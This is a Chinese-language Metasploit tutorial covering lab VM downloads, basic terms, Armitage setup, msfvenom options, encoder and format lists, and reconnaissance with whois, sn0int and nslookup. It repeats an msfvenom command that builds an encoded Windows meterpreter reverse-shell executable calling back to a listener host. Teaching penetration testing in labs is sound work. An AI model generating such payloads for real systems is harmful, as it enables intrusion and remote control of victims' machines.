Windows 2000 Professional
链接:https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm
提取码:upsm
Windows Server 2003 Standard x64 Edition
链接:https://pan.baidu.com/s/1Ro-BoTmp-1kq0W_lB9Oiww?pwd=ngsb
提取码:ngsb
Windows 7 x64
链接:https://pan.baidu.com/s/1-vLtP58-GXmkau0OLNoGcg?pwd=zp3o
提取码:zp3o
Debian 6(Kali Linux)
链接:https://pan.baidu.com/s/1Uw6SXS8z_IxdkNpLr9y0zQ?pwd=s2i5
提取码:s2i5
安装了Apatche、Tomcat、MySQL、 vsftpd并且配套Web安全测试练习教案
cd /usr/local/apache-tomcat-8.5.81/bin ./startup.sh service mysql start
打开浏览器输入127.0.0.1:8080/sec/
Metasploitable2-Linux (with vsftpd 2.3.4)
链接:https://pan.baidu.com/s/1a71zOXGi_9aLrXyEnvkHwQ?pwd=17g6
提取码:17g6
解压后直接为vmx文件,直接可用
基本概念
通讯协议
ARP
ICMP
TCP
专业术语
渗透攻击(Exploit)
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。
攻击载荷(Payload)
我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立个反向连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是能在目标机器上执行有限命令的程序。
Shellcode
是进行攻击时的一系列被当作payload 的指令,通常在目标机器上执行之后提供一个可执行命令的shell
模块(Module)
MSF 的模块,由一系列代码组成。
监听器(Listener)
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。
编码器(encoders)
msfencode –l 查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai
Metasploit用户接口
MSF终端
#msfconsole msf6>help connect
MSF命令行
#msfconsole -x script; set rhost [ip]; set lhost [ip]; set PAYLOAD “…”;run #msfconsole -r path/xxx.rc
Armitage
安装
下载Armitage:https://gitlab.com/kalilinux/packages/armitage
解压armitage
#cd armitage #./package.sh # cd release #ll drwxr-xr-x 2 root root 4096 6月 29 18:40 unix drwxr-xr-x 2 root root 4096 6月 29 18:40 windows #cd /etc/postgresql/14/main/ #gedit pg_hba.conf |
注释掉所有
# "local" is for Unix domain socket connections only local all all trust # IPv4 local connections: host all all 127.0.0.1/32 trust # IPv6 local connections: host all all ::1/128 trust |
|
# service postgresql stop # msfdb reinit #service postgresql start #cd /home/jerry/下载/armitage-kali-master/release/unix # ./armitage |
|
产生被控端与主控端
扫描
Metasploit功能程序
MSF攻击荷载生成器
编写语言 |
输出语言 |
Python |
C |
Web 语言 |
JavaScript |
# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=-f exe -o payload.exe
Options:
参数 |
内容 |
解析 |
|
-l |
--list |
列出[类型]的所有模块。类型包括:有效载荷、编码器、NOP、平台、ARCH、加密、格式、所有 |
|
-p |
--payload |
要使用的有效负载(-list payloads to list,--list options for arguments)。为自定义指定“-”或STDIN |
|
--list-options |
列表--有效载荷的标准、高级和规避选项 |
||
-f |
--format |
输出格式(使用--要列出的列表格式) |
|
-e |
--encoder |
要使用的编码器(使用--列出要列出的编码器) |
|
--service-name |
生成服务二进制文件时要使用的服务名称 |
||
--sec-name |
生成大型Windows二进制文件时要使用的新节名称。默认值:随机4字符alpha字符串 |
||
--smallest |
使用所有可用编码器生成尽可能最小的有效负载 |
||
--encrypt |
要应用于外壳代码的加密或编码类型(使用--list encrypt to list) |
||
--encrypt-key |
用于加密的密钥 |
||
--encrypt-iv |
用于–encrypt的初始化向量 |
||
-a |
--arch |
用于--有效负载和--编码器的体系结构(使用--列出要列出的ARCH) |
|
--platform |
用于--有效负载的平台(使用--列出要列出的平台) |
||
-o |
--out |
将有效负载保存到文件 |
|
-b |
--bad-chars |
要避免的字符示例:“\\x00\\xff” |
|
-n |
--nopsled |
将[长度]大小的NOSLED预先添加到有效负载上 |
|
--pad-nops |
使用-n指定的nopled size作为总有效负载大小,自动在nopled前面加上数量(nops减去有效负载长度) |
||
-s |
--space |
产生的有效负载的最大大小 |
|
--encoder-space |
编码有效负载的最大大小(默认为-s值) |
||
-i |
--iterations |
对有效负载进行编码的次数 |
|
-c |
--add-code |
指定要包含的其他win32外壳代码文件 |
|
-x |
--template |
指定要用作模板的自定义可执行文件 |
|
-k |
--keep |
保留--template行为并将负载作为新线程注入 |
|
-v |
--var-name |
指定用于特定输出格式的自定义变量名称 |
|
-t |
--timeout |
从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用) |
|
-h |
--help |
显示此消息 |
|
MSF编码器
# msfvenom -l encoders Framework Encoders [--encoder]
Name |
Rank |
Description |
cmd/brace |
low |
Bash Brace Expansion Command Encoder |
cmd/echo |
good |
Echo Command Encoder |
cmd/generic_sh |
manual |
Generic Shell Variable Substitution Command Encoder |
cmd/ifs |
low |
Bourne ${IFS} Substitution Command Encoder |
cmd/perl |
normal |
Perl Command Encoder |
cmd/powershell_base64 |
excellent |
Powershell Base64 Command Encoder |
cmd/printf_php_mq |
manual |
printf(1) via PHP magic_quotes Utility Command Encoder |
generic/eicar |
manual |
The EICAR Encoder |
generic/none |
normal |
The "none" Encoder |
mipsbe/byte_xori |
normal |
Byte XORi Encoder |
mipsbe/longxor |
normal |
XOR Encoder |
mipsle/byte_xori |
normal |
Byte XORi Encoder |
mipsle/longxor |
normal |
XOR Encoder |
php/base64 |
great |
PHP Base64 Encoder |
ppc/longxor |
normal |
PPC LongXOR Encoder |
ppc/longxor_tag |
normal |
PPC LongXOR Encoder |
ruby/base64 |
great |
Ruby Base64 Encoder |
sparc/longxor_tag |
normal |
SPARC DWORD XOR Encoder |
x64/xor |
normal |
XOR Encoder |
x64/xor_context |
normal |
Hostname-based Context Keyed Payload Encoder |
x64/xor_dynamic |
normal |
Dynamic key XOR Encoder |
x64/zutto_dekiru |
manual |
Zutto Dekiru |
x86/add_sub |
manual |
Add/Sub Encoder |
x86/alpha_mixed |
low |
Alpha2 Alphanumeric Mixedcase Encoder |
x86/alpha_upper |
low |
Alpha2 Alphanumeric Uppercase Encoder |
x86/avoid_underscore_tolower |
manual |
Avoid underscore/tolower |
x86/avoid_utf8_tolower |
manual |
Avoid UTF8/tolower |
x86/bloxor |
manual |
BloXor - A Metamorphic Block Based XOR Encoder |
x86/bmp_polyglot |
manual |
BMP Polyglot |
x86/call4_dword_xor |
normal |
Call+4 Dword XOR Encoder |
x86/context_cpuid |
manual |
CPUID-based Context Keyed Payload Encoder |
x86/context_stat |
manual |
stat(2)-based Context Keyed Payload Encoder |
x86/context_time |
manual |
time(2)-based Context Keyed Payload Encoder |
x86/countdown |
normal |
Single-byte XOR Countdown Encoder |
x86/fnstenv_mov |
normal |
Variable-length Fnstenv/mov Dword XOR Encoder |
x86/jmp_call_additive |
normal |
Jump/Call XOR Additive Feedback Encoder |
x86/nonalpha |
low |
Non-Alpha Encoder |
x86/nonupper |
low |
Non-Upper Encoder |
x86/opt_sub |
manual |
Sub Encoder (optimised) |
x86/service |
manual |
Register Service |
x86/shikata_ga_nai |
excellent |
Polymorphic XOR Additive Feedback Encoder |
x86/single_static_bit |
manual |
Single Static Bit |
x86/unicode_mixed |
manual |
Alpha2 Alphanumeric Unicode Mixedcase Encoder |
x86/unicode_upper |
manual |
Alpha2 Alphanumeric Unicode Uppercase Encoder |
x86/xor_dynamic |
normal |
Dynamic key XOR Encoder |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF攻击载荷
# msfvenom -l payloads
MSF NOP
# msfvenom -l nops Framework NOPs (11 total) ========================= Name Description ---- ----------- aarch64/simple Simple NOP generator armle/simple Simple NOP generator cmd/generic Generates harmless padding for command payloads. mipsbe/better Better NOP generator php/generic Generates harmless padding for PHP scripts ppc/simple Simple NOP generator sparc/random SPARC NOP generator tty/generic Generates harmless padding for TTY input x64/simple An x64 single/multi byte NOP instruction generator. x86/opty2 Opty2 multi-byte NOP generator x86/single_byte Single-byte NOP generator MSF平台
MSF平台
# msfvenom -l platforms Framework Platforms [--platform] ======================================== Name ---- aix android apple_ios arista brocade bsd bsdi cisco firefox freebsd hardware hpux irix java javascript juniper linux mainframe mikrotik multi netbsd netware nodejs openbsd osx php python r ruby solaris unifi unix unknown
Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF有效负载和--编码器的体系结构
# msfvenom -l archs Framework Architectures [--arch] ======================================== Name ---- aarch64 armbe armle cbea cbea64 cmd dalvik firefox java mips mips64 mips64le mipsbe mipsle nodejs php ppc ppc64 ppc64le ppce500v2 python r ruby sparc sparc64 tty x64 x86 x86_64 zarch
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
MSF应用于外壳代码的加密或编码类型
# msfvenom -l encrypt Framework Encryption Formats [--encrypt] ================================================ Name ---- aes256 base64 rc4 xor
MSF文件格式
# msfvenom -l formats msfvenom -l formats Framework Executable Formats [--format] =============================================== Name ---- asp aspx aspx-exe axis2 dll elf elf-so exe exe-only exe-service exe-small hta-psh jar jsp loop-vbs macho msi msi-nouac osx-app psh psh-cmd psh-net psh-reflection python-reflection vba vba-exe vba-psh vbs war Framework Transform Formats [--format] ============================================== Name ---- base32 base64 bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
查看配置
# msfvenom -p moduleName --list-options
比如:
msfvenom -p windows/shell_reverse_tcp --list-options
Nasm shell
Netwide Assembler (简称 NASM)是一款基于x86架构的汇编与反汇编软件。它可以用来编写16位(8086、80286等)、32位(IA-32)和64位(x86_64)的程序。NASM被认为是Linux平台上最受欢迎的汇编工具之一。
NASM 最初是在朱利安·霍尔(Julian Hall)的协助下由西蒙·泰瑟姆(Simon Tatham)开发的。截至2016年,它被一个由Hans Peter Anvin领导的小团队所维护。 它是一款基于简化版BSD许可证(2-clause BSD License)的开放源代码软件。
cd /usr/share/metasploit-framework/tools/exploit # ./nasm_shell.rb nasm > jmp esp 00000000 FFE4 jmp esp nasm >
Metasploit Express & Metasploit Pro
信息收集
被动信息搜索
Whois
格式
msf > whois example.com msf> whois 192.168.1.100
例子
msf6 > whois 3testing.com [*] exec: whois 3testing.com Domain Name: 3TESTING.COM Registry Domain ID: 513017975_DOMAIN_COM-VRSN Registrar WHOIS Server: grs-whois.hichina.com Registrar URL: http://www.net.cn Updated Date: 2017-06-27T15:41:17Z Creation Date: 2006-07-09T13:24:36Z Registry Expiry Date: 2023-07-09T13:24:36Z Registrar: Alibaba Cloud Computing (Beijing) Co., Ltd. Registrar IANA ID: 420 Registrar Abuse Contact Email: DomainAbuse@service.aliyun.com Registrar Abuse Contact Phone: +86.95187 Domain Status: ok https://icann.org/epp#ok Name Server: DNS10.HICHINA.COM Name Server: DNS9.HICHINA.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-06-20T04:09:37Z <<<
msf6 > whois 123.56.135.186 [*] exec: whois 123.56.135.186 % [whois.apnic.net] % Whois data copyright termshttp://www.apnic.net/db/dbcopyright.html % Information related to '123.56.0.0 - 123.57.255.255' % Abuse contact for '123.56.0.0 - 123.57.255.255' is 'ipas@cnnic.cn' inetnum:123.56.0.0 - 123.57.255.255 netname:ALISOFT descr: Aliyun Computing Co., LTD descr: 5F, Builing D, the West Lake International Plaza of S&T descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099 country:CN admin-c:ZM1015-AP tech-c: ZM877-AP tech-c: ZM876-AP tech-c: ZM875-AP abuse-c:AC1601-AP status: ALLOCATED PORTABLE mnt-by: MAINT-CNNIC-AP mnt-irt:IRT-CNNIC-CN last-modified: 2021-06-16T01:25:33Z source: APNIC irt:IRT-CNNIC-CN address:Beijing, China e-mail: ipas@cnnic.cn abuse-mailbox: ipas@cnnic.cn admin-c:IP50-AP tech-c: IP50-AP auth: # Filtered remarks:Please note that CNNIC is not an ISP and is not remarks:empowered to investigate complaints of network abuse. remarks:Please contact the tech-c or admin-c of the network. mnt-by: MAINT-CNNIC-AP last-modified: 2021-06-16T01:39:57Z source: APNIC role: ABUSE CNNICCN address:Beijing, China country:ZZ phone: +000000000 e-mail: ipas@cnnic.cn admin-c:IP50-AP tech-c: IP50-AP nic-hdl:AC1601-AP remarks:Generated from irt object IRT-CNNIC-CN abuse-mailbox: ipas@cnnic.cn mnt-by: APNIC-ABUSE last-modified: 2020-05-14T11:19:01Z source: APNIC person: Li Jia address:NO.969 West Wen Yi Road, Yu Hang District, Hangzhou country:CN phone: +86-0571-85022088 e-mail: jiali.jl@alibaba-inc.com nic-hdl:ZM1015-AP mnt-by: MAINT-CNNIC-AP last-modified: 2014-07-30T02:02:01Z source: APNIC person: Guoxin Gao address:5F, Builing D, the West Lake International Plaza of S&T address:No.391 Wen'er Road, Hangzhou City address:Zhejiang, China, 310099 country:CN phone: +86-0571-85022600 fax-no: +86-0571-85022600 e-mail: anti-spam@list.alibaba-inc.com nic-hdl:ZM875-AP mnt-by: MAINT-CNNIC-AP last-modified: 2014-07-30T01:56:01Z source: APNIC person: security trouble e-mail: yitian.gaoyt@alibaba-inc.com address:5th,floor,Building D,the West Lake International Plaza of S&T,391#Wen??r Road address:Hangzhou, Zhejiang, China phone: +86-0571-85022600 country:CN mnt-by: MAINT-CNNIC-AP nic-hdl:ZM876-AP last-modified: 2021-04-13T23:22:33Z source: APNIC person: Guowei Pan address:5F, Builing D, the West Lake International Plaza of S&T address:No.391 Wen'er Road, Hangzhou City address:Zhejiang, China, 310099 country:CN phone: +86-0571-85022088-30763 fax-no: +86-0571-85022600 e-mail: guowei.pangw@alibaba-inc.com nic-hdl:ZM877-AP mnt-by: MAINT-CNNIC-AP last-modified: 2013-07-09T01:34:02Z source: APNIC % Information related to '123.56.128.0/19AS4837' route: 123.56.128.0/19 descr: CNC Group CHINA169 Fujian Province Network descr: Addresses from APNIC(YJZXNET) country:CN origin: AS4837 mnt-by: MAINT-CNCGROUP-RR last-modified: 2008-09-04T07:55:26Z source: APNIC % This query was served by the APNIC Whois Service version 1.88.16 (WHOIS-AU3)
netcraft
https://searchdns.netcraft.com/
Maltego
sn0int
安装
# apt install debian-keyring # gpg -a --export --keyring /usr/share/keyrings/debian-maintainers.gpg git@rxv.cc | apt-key add - # apt-key adv --keyserver keyserver.ubunt.com --refresh-keys dit@rxv.cc # echo deb http://apt.vulns.sexy stable main>/etc/apt/sources.list.d/apt-vulns-key.list # apt update # apt install sn0int #sn0int [sn0int][default] > pkg quickstart
使用
[sn0int][default] > workspace demo [+] Connecting to database [sn0int][demo] > add domain [?] Domain: baidu.com [sn0int][demo] > select domains #1, "baidu.com" [sn0int][demo] > use ctlogs [sn0int][demo][kpcyrd/ctlogs] > run [sn0int][demo] > use ctlogs [sn0int][demo][kpcyrd/ctlogs] > run [*] "baidu.com" : Adding subdomain "durobotdev.baidu.com" [*] "baidu.com" : Adding subdomain "play-infoflow.baidu.com" [*] "baidu.com" : Adding subdomain "www.play-infoflow.baidu.com" [*] "baidu.com" : Adding subdomain "dlswbr.baidu.com" [*] "baidu.com" : Adding subdomain "otapcdn.baidu.com" [*] "baidu.com" : Adding subdomain "foundation.baidu.com" [*] "baidu.com" : Adding subdomain "mdm-duguanjia.baidu.com" [*] "baidu.com" : Adding subdomain "lookup.api.bsb.baidu.com" [*] "baidu.com" : Adding subdomain "download.api.bsb.baidu.com" [*] "baidu.com" : Adding subdomain "duke.baidu.com" [*] "baidu.com" : Adding subdomain "ditan.huodong.baidu.com" [*] "baidu.com" : Adding subdomain "httpsdns.baidu.com" [*] "baidu.com" : Adding subdomain "vpn.baidu.com" [*] "baidu.com" : Adding subdomain "otacdn.baidu.com" [*] "baidu.com" : Adding subdomain "trafficsafe.baidu.com"
ZoomEye
nslookup
msf6 > nslookup set type=mx example.com
例子
msf6 > nslookup www.3testing.com [*] exec: nslookup www.3testing.com Server: 8.8.8.8 Address:8.8.8.8#53 Non-authoritative answer: Name: www.3testing.com Address: 123.56.135.186 msf6 > nslookup www.3testing.com [*] exec: nslookup www.3testing.com Server: 192.168.0.1 Address: 192.168.0.1#53 Non-authoritative answer: Name: www.3testing.com Address: 123.56.135.186
